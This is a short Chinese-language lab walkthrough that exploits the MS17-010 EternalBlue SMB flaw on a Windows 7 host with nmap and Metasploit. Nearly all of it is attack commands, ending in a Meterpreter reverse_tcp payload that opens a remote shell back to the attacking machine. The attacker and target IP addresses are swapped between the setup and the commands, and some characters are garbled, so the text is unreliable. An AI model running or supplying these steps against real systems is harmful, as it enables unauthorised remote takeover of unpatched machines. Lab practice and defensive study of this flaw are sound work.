0x00 環(huán)境:
1.攻擊機(jī):ubuntu + msf + nmap 192.168.224.129
2.靶 機(jī):win7 64位 192.168.224.134
0x01 確定目標(biāo)之后卷玉,對(duì)目標(biāo)進(jìn)行端口掃描。
nmap -p445 192.168.224.129 -Pn
0x02 使用msf的ms17-010進(jìn)行攻擊
1.查找ms17-010模塊
msf > search ms17-010
2.使用use auxiliary/scanner/smb/smb_ms17_010
進(jìn)行檢測(cè)
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.224.129
msf auxiliary(scanner/smb/smb_ms17_010) > run
3.使用exploit/windows/smb/ms17_010_eternalblue
模塊進(jìn)行攻擊(reverse_tcp反向)
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.224.129
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.224.134
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit